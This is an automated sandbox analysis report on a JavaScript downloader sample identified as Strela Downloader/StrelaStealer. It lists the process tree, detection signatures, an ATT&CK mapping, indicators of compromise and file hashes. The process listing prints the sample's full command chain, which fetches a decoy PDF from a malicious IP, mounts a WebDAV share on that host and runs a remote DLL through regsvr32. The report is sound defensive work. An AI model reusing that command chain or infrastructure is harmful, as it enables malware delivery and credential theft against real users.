Windows
Analysis Report
894623912226711207.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7552 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\89462 3912226711 207.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7644 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\126 5713230582 1.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7652 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7692 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 7872 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 8096 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 1988 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 44 --field -trial-han dle=1644,i ,100725180 9225454373 0,14789048 6088939765 78,131072 --disable- features=B ackForward Cache,Calc ulateNativ eWinOcclus ion,WinUse BrowserSpe llChecker /prefetch: 8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 8156 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
15% | Virustotal | Browse | ||
11% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588983 |
Start date and time: | 2025-01-11 07:58:49 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 57s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 894623912226711207.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 3.233.129.217, 3.219.243.226, 52.22.41.97, 52.6.155.20, 172.64.41.3, 162.159.61.3, 184.28.90.27, 199.232.210.172, 23.209.209.135, 2.16.168.107, 2.16.168.105, 23.55.235.177, 23.54.161.98, 192.168.2.8, 20.109.210.53, 23.47.168.24, 20.12.23.50
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
01:59:45 | API Interceptor | |
01:59:48 | API Interceptor | |
01:59:49 | API Interceptor | |
02:00:01 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.8021984431463006 |
Encrypted: | false |
SSDEEP: | 1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUA6:RJE+Lfki1GjHwU/+vVhWqpv |
MD5: | A3E856A933D41CE792EDB252E33C9F8D |
SHA1: | 1F60A428EB8773A1B170408A33F32246931DBF37 |
SHA-256: | 5E4033EC05516CD72BA24041BF08E44322E8DC4E63E022211E2E3B898263D0EC |
SHA-512: | 8AA6937A2BF54C1D66F11EB55FBEA1ACF4733141BCDADB8D36DD191031DF2B75BA57F0E334F05F3818937F7B0CFF11D50F2038324C6667340CF4E1B5509CBC8F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1048576 |
Entropy (8bit): | 0.9433175772582482 |
Encrypted: | false |
SSDEEP: | 1536:7SB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:7azaHvxXy2V2UR |
MD5: | D8EED9B7543E5E0B15E4DE84E23BB87E |
SHA1: | AF29790B4CE58B5EFC4EAAFD170A8FCFFC719228 |
SHA-256: | C2D35781E96D0AE8ABBCD2B446E94CB939A233B2FDA225645F9BCAF7C7820580 |
SHA-512: | 23B379B57873B3CA1B7E236BCE312D1A8279C05E1A22EC81CFD0A847DFB1CC19A1D040703384E1E4DE05A8ACCF9322E608F2F9F246046EA42E99F5CCA362A2E2 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.0811269400395849 |
Encrypted: | false |
SSDEEP: | 3:u7mlXKYej5YjnFtqll/nqlFcl1ZUllll3cUs1jll//ollGBnX/l/Tj/k7/t:NXKzj5gqll/qlFclQ/ldcpA254 |
MD5: | 2D8E702D17FD34E48429A80F281CDED0 |
SHA1: | 44B1C4428099C317B1233D839B1026A72D406C35 |
